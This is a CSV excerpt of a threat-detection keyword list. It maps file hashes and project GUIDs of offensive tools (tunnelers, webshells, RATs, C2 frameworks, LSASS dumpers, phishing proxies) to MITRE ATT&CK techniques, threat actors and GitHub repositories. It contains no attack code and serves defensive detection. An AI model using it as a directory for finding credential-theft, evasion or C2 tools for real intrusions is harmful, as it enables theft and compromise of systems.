"*54c10f32ffcf38d05a43d06bebe74838cfbad7cd45da199cc5b02e6fc45df57d*",".{0,1000}54c10f32ffcf38d05a43d06bebe74838cfbad7cd45da199cc5b02e6fc45df57d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26826"
"*54c3dcecfeb6224d49ae655207cfe684f95480f16215e32a122e473ac275d0db*",".{0,1000}54c3dcecfeb6224d49ae655207cfe684f95480f16215e32a122e473ac275d0db.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","26827"
"*54c4466dfe0ebd3de29706791a4cf961dea7b2ca7ca8c4ee3fc80fd4206114d3*",".{0,1000}54c4466dfe0ebd3de29706791a4cf961dea7b2ca7ca8c4ee3fc80fd4206114d3.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26828"
"*54c80fa33cb5988d840999e6c901fbba96f857921865c9ed21d0c8b666d926e2*",".{0,1000}54c80fa33cb5988d840999e6c901fbba96f857921865c9ed21d0c8b666d926e2.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26829"
"*54cbfafed88c0b70ede4fe88d02a9de61aee9eb2017c54e7ec0b1c97d755db35*",".{0,1000}54cbfafed88c0b70ede4fe88d02a9de61aee9eb2017c54e7ec0b1c97d755db35.{0,1000}","offensive_tool_keyword","canisrufus","A stealthy Python based Windows backdoor that uses Github as a command and control server","T1105 - T1071 - T1027","TA0003 - TA0011 - TA0005 - TA0010","N/A","Black Basta","C2","https://github.com/maldevel/canisrufus","1","0","#filehash","N/A","10","10","263","78","2017-08-15T15:46:20Z","2017-08-12T06:49:40Z","26830"
"*54d3497f0b4197a649280a6f464d71154d7ecbcc663ab00a3805e820900a7955*",".{0,1000}54d3497f0b4197a649280a6f464d71154d7ecbcc663ab00a3805e820900a7955.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","0","#filehash","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","26832"
"*54d57aae2d1b212526e8b3adc769f0985d1916974af1f0b37b793d3e02c3482d*",".{0,1000}54d57aae2d1b212526e8b3adc769f0985d1916974af1f0b37b793d3e02c3482d.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26833"
"*54db0c7311eba1f9c32da2b1d0b9401117493a9b8bd58814e1cdb62239151204*",".{0,1000}54db0c7311eba1f9c32da2b1d0b9401117493a9b8bd58814e1cdb62239151204.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","26835"
"*54ddbf803299d65815109ddd5caafbb62aca474e2fc8ca33f2bc0e8925e45337*",".{0,1000}54ddbf803299d65815109ddd5caafbb62aca474e2fc8ca33f2bc0e8925e45337.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26836"
"*54e500e6a857e4af31cd8e2b26b990e190e497ac0c93e654ea18dd8f3d9fbf12*",".{0,1000}54e500e6a857e4af31cd8e2b26b990e190e497ac0c93e654ea18dd8f3d9fbf12.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26838"
"*54e82ce2900876594c573f74437a23034f70f959e428bb2cf046afe73f6abc56*",".{0,1000}54e82ce2900876594c573f74437a23034f70f959e428bb2cf046afe73f6abc56.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","26839"
"*54f6d83348b56e49afe082346be15cefa73e4baee6bf3ca909005677117b4262*",".{0,1000}54f6d83348b56e49afe082346be15cefa73e4baee6bf3ca909005677117b4262.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26843"
"*54fa00769c5dfc41a26767786517a7b99a7551b16b5589cf3d5287ae1def8534*",".{0,1000}54fa00769c5dfc41a26767786517a7b99a7551b16b5589cf3d5287ae1def8534.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","26844"
"*54fe99f13b593d3acfc583e17d0bfd2e315d0ee20e737610bede18eb173ae864*",".{0,1000}54fe99f13b593d3acfc583e17d0bfd2e315d0ee20e737610bede18eb173ae864.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","0","#filehash","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","26845"
"*55004532300a4eac4abf5f02f8c20e6c0071ffe1ce065da805f7f45f3e154a72*",".{0,1000}55004532300a4eac4abf5f02f8c20e6c0071ffe1ce065da805f7f45f3e154a72.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","26846"
"*550168d7c4f722b95288f8402f9ac3422dbbae250a3f36e3a10a985ac7f1c84a*",".{0,1000}550168d7c4f722b95288f8402f9ac3422dbbae250a3f36e3a10a985ac7f1c84a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","26847"
"*55049f7690abbbb5c8dc844e54b63269d111c0cd21e98854c666a27788dc5de6*",".{0,1000}55049f7690abbbb5c8dc844e54b63269d111c0cd21e98854c666a27788dc5de6.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","26848"
"*5506149199922b7560a4f6d669fb7f7b61f77668c5f8cb5a81128d0bdc1a2b2f*",".{0,1000}5506149199922b7560a4f6d669fb7f7b61f77668c5f8cb5a81128d0bdc1a2b2f.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","26849"
"*55079c4485a5c2df00c8e1c2f068cac31ffe13f95f0f7a822921c582f1dbeda5*",".{0,1000}55079c4485a5c2df00c8e1c2f068cac31ffe13f95f0f7a822921c582f1dbeda5.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","26850"
"*55096accdcb71eb43edd3001d4f6ec9c40ea88d448ba9d845782ff8e70df2fb3*",".{0,1000}55096accdcb71eb43edd3001d4f6ec9c40ea88d448ba9d845782ff8e70df2fb3.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","26851"
"*5511d77f4fec100fd2f4c0993ff991a2516a473033a18216ea54f0502785b199*",".{0,1000}5511d77f4fec100fd2f4c0993ff991a2516a473033a18216ea54f0502785b199.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26853"
"*55155cb2d44c4f860926098d53a96904a1ac89e04130d8db431a2170b389696b*",".{0,1000}55155cb2d44c4f860926098d53a96904a1ac89e04130d8db431a2170b389696b.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","26854"
"*55199d5089be9072f5e556c5bb2fc11a3644fec2e652883e2b4da20e851552df*",".{0,1000}55199d5089be9072f5e556c5bb2fc11a3644fec2e652883e2b4da20e851552df.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26855"
"*5521ddf91976c978d2cf175fc1637c1d201ae868e3df70e7d7a5f82db9bc2829*",".{0,1000}5521ddf91976c978d2cf175fc1637c1d201ae868e3df70e7d7a5f82db9bc2829.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","26857"
"*5523069e10c357b8a5737e287ae18fc0d39c6870a724f40e4a49ef9a948c74e0*",".{0,1000}5523069e10c357b8a5737e287ae18fc0d39c6870a724f40e4a49ef9a948c74e0.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","26858"
"*5529ff4b4c60d1cfefb02f145e149ffb166229e03aff4d8917340190753cde9e*",".{0,1000}5529ff4b4c60d1cfefb02f145e149ffb166229e03aff4d8917340190753cde9e.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","#filehash","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","26859"
"*5531A5C5-8710-48AD-BEFE-88E26F6CF798*",".{0,1000}5531A5C5\-8710\-48AD\-BEFE\-88E26F6CF798.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","#GUIDProject","N/A","9","","N/A","","","","26861"
"*553282d19684e327d410ace6c54aa6cbdecba1eb2e67ecbae0e44d46426eca82*",".{0,1000}553282d19684e327d410ace6c54aa6cbdecba1eb2e67ecbae0e44d46426eca82.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","26862"
"*55341dfe5a2e7ff47bde6573885693ec67d9662c40a7b321059fe1af6d5babaf*",".{0,1000}55341dfe5a2e7ff47bde6573885693ec67d9662c40a7b321059fe1af6d5babaf.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#filehash","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","26863"
"*553447c0b7f3f66e4056047c98783665a17097b0a2aca74a507e56a6d7c1e889*",".{0,1000}553447c0b7f3f66e4056047c98783665a17097b0a2aca74a507e56a6d7c1e889.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26864"
"*553783ac96602dadd391b657eec078f7ab768c1b06bc04373e9fe9068f113041*",".{0,1000}553783ac96602dadd391b657eec078f7ab768c1b06bc04373e9fe9068f113041.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","26865"
"*553a143020a31eef62e4c616b44a15e63549897111af6d5c472ec46ec02bc240*",".{0,1000}553a143020a31eef62e4c616b44a15e63549897111af6d5c472ec46ec02bc240.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","26866"
"*5548fb14ad8d39bd75f82540c19e571edcc8dabb3ba6b4b46f488bfad3035e07*",".{0,1000}5548fb14ad8d39bd75f82540c19e571edcc8dabb3ba6b4b46f488bfad3035e07.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","26867"
"*554F8E48FA40E48E261B91A4F9F1930E099EBF337DFAC826BC41F4E850C4889F*",".{0,1000}554F8E48FA40E48E261B91A4F9F1930E099EBF337DFAC826BC41F4E850C4889F.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#filehash","Dispossessor samples","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","26868"
"*555009ba8f9b57011fef7ca143c78e15d11bce2e471f6b742cbddda5c2d12e60*",".{0,1000}555009ba8f9b57011fef7ca143c78e15d11bce2e471f6b742cbddda5c2d12e60.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","26869"
"*555662D4CCBB940D87869E6295EC7CC74BB85D8C8FC5916EC34D1226704578C5*",".{0,1000}555662D4CCBB940D87869E6295EC7CC74BB85D8C8FC5916EC34D1226704578C5.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","#filehash","AD Enumeration","7","10","1015","173","2025-04-11T14:35:08Z","2017-04-06T12:28:37Z","26870"
"*555AD0AC-1FDB-4016-8257-170A74CB2F55*",".{0,1000}555AD0AC\-1FDB\-4016\-8257\-170A74CB2F55.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","#GUIDproject","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","26871"
"*555AD0AC-1FDB-4016-8257-170A74CB2F55*",".{0,1000}555AD0AC\-1FDB\-4016\-8257\-170A74CB2F55.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","#GUIDproject","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","26872"
"*555e208fdc7f01d35922ceb80bd2a1088f6cef78e8f2e49f115b628a15984001*",".{0,1000}555e208fdc7f01d35922ceb80bd2a1088f6cef78e8f2e49f115b628a15984001.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","26873"
"*55625889-F7BB-4533-9702-DDE98FBB0DDF*",".{0,1000}55625889\-F7BB\-4533\-9702\-DDE98FBB0DDF.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","26874"
"*55652291077fbb6c957ea42379d965892e29695a85ce00844c7b1c83971ac1e6*",".{0,1000}55652291077fbb6c957ea42379d965892e29695a85ce00844c7b1c83971ac1e6.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","26876"
"*556604aedbff01f33a7df0040641cf6bad183eab1c84a5ecdd90521762b04c54*",".{0,1000}556604aedbff01f33a7df0040641cf6bad183eab1c84a5ecdd90521762b04c54.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","26877"
"*5571bc0232f7f7911042503b2a2224ad420788d999eb819257a00943928a56bb*",".{0,1000}5571bc0232f7f7911042503b2a2224ad420788d999eb819257a00943928a56bb.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","#filehash","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","26878"
"*5576bc01df05427e60683abf6c5f01b6a3ec4fbeee43ae68bb1fb20ba14b49a1*",".{0,1000}5576bc01df05427e60683abf6c5f01b6a3ec4fbeee43ae68bb1fb20ba14b49a1.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","26882"
"*5584e3e3bbef3abc02ab49d0d5d06f6cb021becd41da4600dce3096830ce39c5*",".{0,1000}5584e3e3bbef3abc02ab49d0d5d06f6cb021becd41da4600dce3096830ce39c5.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","26885"
"*5585684234d4f65469f743db35a100a4aaa2c7d89fe8005dba4698885e0c53b6*",".{0,1000}5585684234d4f65469f743db35a100a4aaa2c7d89fe8005dba4698885e0c53b6.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","26886"
"*558919265d6ae62662b5326b9dfa3a03b7a07bb9b657bc13130adc12124d06d0*",".{0,1000}558919265d6ae62662b5326b9dfa3a03b7a07bb9b657bc13130adc12124d06d0.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","26887"
"*558a73bf1f4a3ecc59133a10d1a7892712f2bd30326f86a12d5c7060274d734d*",".{0,1000}558a73bf1f4a3ecc59133a10d1a7892712f2bd30326f86a12d5c7060274d734d.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","#filehash","N/A","7","7","629","81","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z","26888"
"*558df705dd4b6213c11e858b7c32960eaec39360*",".{0,1000}558df705dd4b6213c11e858b7c32960eaec39360.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","26889"
